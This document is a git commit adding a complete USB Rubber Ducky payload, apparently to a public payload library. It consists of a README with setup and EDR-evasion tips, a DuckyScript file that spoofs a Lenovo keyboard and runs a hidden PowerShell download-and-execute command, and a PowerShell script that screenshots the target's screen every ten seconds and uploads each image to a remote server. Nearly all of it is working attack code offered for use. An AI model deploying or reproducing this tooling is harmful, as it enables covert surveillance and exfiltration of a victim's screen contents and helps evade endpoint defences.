Add Windows-Screenshot-Exfil payload

2024-08-06 09:58:39 +02:00 · 2024-08-06 09:58:39 +02:00 · f0cb608d09
parent 3b30121b9e
commit f0cb608d09
3 changed files with 203 additions and 0 deletions
--- a/payloads/library/exfiltration/Windows-Screenshot-Exfil/README.md
+++ b/payloads/library/exfiltration/Windows-Screenshot-Exfil/README.md
@ -0,0 +1,67 @@
+# Windows Screenshot Exfiltration Payload
+
+## Overview
+
+This payload captures screenshots from a Windows machine every 10 seconds and uploads them to a specified server using the Powershell. The payload is designed to run until the window is closed or the loop is broken out.
+
+## Features
+
+- **Target OS**: Windows 10, 11
+- **Exfiltration Method**: Screenshots are taken and uploaded to a server every 10 seconds.
+- **Detection and Execution**: Automatically detects if the target OS is Windows and executes the payload accordingly.
+- **HID Emulation**: Emulates a Lenovo keyboard with a random serial number.
+- **Fallback**: If the OS is not Windows, the USB Rubber Ducky will function as a storage device.
+
+## Files
+
+- `payload.txt`: The main script that is deployed to the USB Rubber Ducky.
+- `script.ps1`: The Staged PowerShell script that takes screenshots and uploads them to the server.
+
+## Setup Instructions
+
+1. **Server Setup**: Set up a server to receive the uploaded screenshots and host the script.ps1 file. I used [IngoKl/HTTPUploadExfil](https://github.com/IngoKl/HTTPUploadExfil) as it is pretty easy to set up.
+2. **Update URLS**: Modify `script.ps1` to include your server URL where the screenshots will be uploaded and modify `payload.txt` to reference the URL of the hosted `script.ps1`
+    - `$url` in `script.ps1`
+    - `#MY_STAGED_SCRIPT` in `payload.txt`
+3. **Upload Files**:
+   - Inject `payload.txt` on the USB Rubber Ducky.
+   - Host `script.ps1` on a web server.
+
+Note: In the provided files, the exanple URLs are followed by `/l` in the payload and by `/p` for the sending of screenshots, this is because I use HTTPUploadExfil, modify this is you do not use the same exfil server as I do.
+
+## Usage
+
+### Payload Execution
+
+1. **Insert USB Rubber Ducky**: Plug the USB Rubber Ducky into the target machine.
+2. **OS Detection**: The payload automatically detects if the target OS is Windows.
+3. **Payload Deployment**:
+   - If Windows is detected, it emulates a Lenovo keyboard, opens PowerShell, and runs the PowerShell script.
+   - If the target OS is not Windows, it switches to storage mode (Usefull for dev purposes).
+
+### PowerShell Script Execution
+
+The PowerShell script (`script.ps1`) runs the following commands:
+
+1. Takes a screenshot every 10 seconds.
+2. Uploads the screenshot to the specified server.
+3. Repeats until the PowerShell window is closed.
+
+
+## Alternative
+
+Some EDR detect the download of a powershell script from internet, this clould led to the payload beeing blocked. As an alternative, you could take the content of `script.ps1` and put in directly in the payload.
+
+```
+GUI r
+DELAY 500
+STRINGLN powershell
+DELAY 500
+STRINGLN
+    [... The content of script.ps1 here ...]
+END_STRINGLN
+ENTER
+DELAY 500
+ALT SPACE
+STRING n
+```
--- a/payloads/library/exfiltration/Windows-Screenshot-Exfil/payload.txt
+++ b/payloads/library/exfiltration/Windows-Screenshot-Exfil/payload.txt
@ -0,0 +1,67 @@
+REM_BLOCK DOCUMENTATION
+    Title: Windows Screenshot Exfiltration
+    Author: https://github.com/thomasboegl1
+    Description: This payload sends you screenshots of the screen every 10sec until the Powershell window is closed.
+    Target: Windows 10, 11
+    Version: 1.0
+    Category: Exfiltration
+END_REM
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+REM REQUIRED - Provide URL used for staged payload
+DEFINE #MY_STAGED_SCRIPT https://example.com/l/script.ps1
+
+IF ($_OS == WINDOWS) THEN
+    REM Emulate Lenovo keyboard with random serial
+    ATTACKMODE HID VID_17EF PID_609B MAN_Lenovo PROD_Duck SERIAL_RANDOM
+    REM Open the Run dialog
+    GUI r
+    DELAY 500
+    REM Type PowerShell command
+    STRINGLN powershell w- h -NoP -NonI -Exec Bypass $pl = iwr #MY_STAGED_SCRIPT; invoke-expression $pl
+ELSE
+    REM The USB Rubber Ducky will function as a flash drive
+    ATTACKMODE STORAGE
+END_IF
--- a/payloads/library/exfiltration/Windows-Screenshot-Exfil/script.ps1
+++ b/payloads/library/exfiltration/Windows-Screenshot-Exfil/script.ps1
@ -0,0 +1,69 @@
+Add-Type @'
+using System;
+using System.Runtime.InteropServices;
+using System.Drawing;
+
+public class DPI {
+  [DllImport("gdi32.dll")]
+  static extern int GetDeviceCaps(IntPtr hdc, int nIndex);
+
+  public enum DeviceCap {
+  VERTRES = 10,
+  DESKTOPVERTRES = 117
+  }
+
+  public static float scaling() {
+  Graphics g = Graphics.FromHwnd(IntPtr.Zero);
+  IntPtr desktop = g.GetHdc();
+  int LogicalScreenHeight = GetDeviceCaps(desktop, (int)DeviceCap.VERTRES);
+  int PhysicalScreenHeight = GetDeviceCaps(desktop, (int)DeviceCap.DESKTOPVERTRES);
+
+  return (float)PhysicalScreenHeight / (float)LogicalScreenHeight;
+  }
+}
+'@ -ReferencedAssemblies 'System.Drawing.dll' -ErrorAction Stop
+
+$url = "https://example.com/p"
+
+
+while ($true) {
+    # Add necessary types
+    Add-Type -AssemblyName System.Windows.Forms,System.Drawing
+
+    # Get virtual screen information
+    $s = [System.Windows.Forms.SystemInformation]::VirtualScreen
+
+    # Create a bitmap of the virtual screen size
+    $b = New-Object System.Drawing.Bitmap ([int32]([math]::round($($s.Width * [DPI]::scaling()), 0))),([int32]([math]::round($($s.Height * [DPI]::scaling()), 0)));
+    [System.Drawing.Graphics]::FromImage($b).CopyFromScreen($s.Left, $s.Top, 0, 0, $b.Size)
+
+    # Save bitmap to a memory stream in PNG format
+    $m = New-Object System.IO.MemoryStream
+    $b.Save($m, [System.Drawing.Imaging.ImageFormat]::Png)
+    $f = $m.ToArray()
+
+    # Set up the multipart form-data
+    $boundary = "----WebKitFormBoundary7MA4YWxkTrZu0gW"
+    $fileName = "$env:COMPUTERNAME-$(Get-Date -Format HHmmss).png"
+    $body = @"
+--$boundary
+Content-Disposition: form-data; name="file"; filename="$fileName"
+Content-Type: image/png
+
+$f
+--$boundary--
+"@
+    # Convert the body to byte array
+    $bB = [System.Text.Encoding]::UTF8.GetBytes($body)
+
+    # Set the headers
+    $headers = @{
+        "Content-Type" = "multipart/form-data; boundary=$boundary"
+    }
+
+    # Send the HTTP request
+    Invoke-WebRequest -Uri $url -Method Post -Headers $headers -Body $bB
+
+    # Wait for 10 seconds before the next iteration
+    Start-Sleep -Seconds 10
+}